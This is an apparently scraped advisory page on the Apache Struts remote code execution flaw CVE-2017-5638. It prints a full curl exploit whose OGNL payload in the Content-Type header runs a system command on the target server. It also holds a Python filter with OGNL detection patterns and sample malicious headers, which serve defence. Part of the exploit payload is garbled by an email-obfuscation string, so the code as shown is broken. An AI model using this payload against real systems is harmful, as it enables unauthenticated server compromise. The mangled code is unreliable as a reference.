Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

CVE-2017-5638 is a critical remote code execution flaw in Apache Struts 2 that originates in the error handling of the framework's Jakarta Multipart parser. It is triggered by a malicious Content-Type header sent in an HTTP request to a Struts-based application. When the header value is malformed, the framework builds an error message, but it incorrectly places the user-supplied Content-Type value into a Freemarker interpolation. That interpolation evaluates any Object-Graph Navigation Language (OGNL) expressions contained in the header, and since OGNL expressions can execute arbitrary Java code on the server, an attacker can use this error-handling path to run system commands with the privileges of the Struts application server, without any form of authentication.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical

Date: 2017-03-07

Prediction: Patch Available

What Undercode Says:

`curl -H "Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context['com.opensymphony.xwork2.ActionContext.container']).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='id').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}" http://target-host.com/struts2-showcase/fileupload/doUpload.action`

How the Exploit Works:

Malicious HTTP Request

OGNL Expression Injection

Arbitrary Command Execution

Protection from this CVE

Immediate Patch Application

Upgrade Struts Version

Input Validation Filtering
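As an added example (not code from the advisory or from the Struts project), the following Python check illustrates the input validation filtering listed above: it flags Content-Type header values that carry OGNL expression markers or that do not parse as a media type at all, so a gateway or log review can triage them before they reach the Jakarta Multipart parser. The sample header values are constructed for the example.

```python
import re

# Constructed sample Content-Type values (not captured traffic). The first two
# are benign; the rest carry OGNL markers of the kind abused by CVE-2017-5638.
SAMPLE_HEADERS = [
    "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW",
    "application/x-www-form-urlencoded",
    "%{(#_='multipart/form-data').(#cmd='id')}",
    "${@java.lang.System@getProperty('os.name')}",
    "multipart/form-data; boundary=%{1+1}",
]

# OGNL expression openers and the static-method / context syntax OGNL uses.
OGNL_MARKERS = re.compile(r"(%\{|\$\{|#_memberAccess|@[\w.]+@|#context\b)")

# Token grammar from RFC 7230; braces are not token characters, so a media
# type or parameter value containing '{' or '}' is rejected by this pattern.
TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
VALID_CONTENT_TYPE = re.compile(
    r"^" + TOKEN + "/" + TOKEN
    + r"(?:\s*;\s*" + TOKEN + r'=(?:"[^"]*"|' + TOKEN + r"))*\s*$"
)


def is_suspicious_content_type(value: str) -> bool:
    """True when the header carries OGNL markers or is not a well-formed media type."""
    if OGNL_MARKERS.search(value):
        return True
    # Allow-list check: anything that is not 'type/subtype; param=value' is rejected,
    # which also catches obfuscated variants the marker list does not know about.
    return VALID_CONTENT_TYPE.match(value) is None


def triage(headers):
    """Return the subset of header values that should be blocked or alerted on."""
    return [h for h in headers if is_suspicious_content_type(h)]


if __name__ == "__main__":
    for header in triage(SAMPLE_HEADERS):
        print("SUSPICIOUS Content-Type:", header)
```

The allow-list check matters more than the marker list: a filter that only looks for `%{` is easy to sidestep, whereas rejecting any value that is not a syntactically valid media type removes the whole class of OGNL payloads from the error-handling path.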

Impact:

Full Server Compromise

Data Theft

Service Disruption

Sources:

Reported By: nvd.nist.gov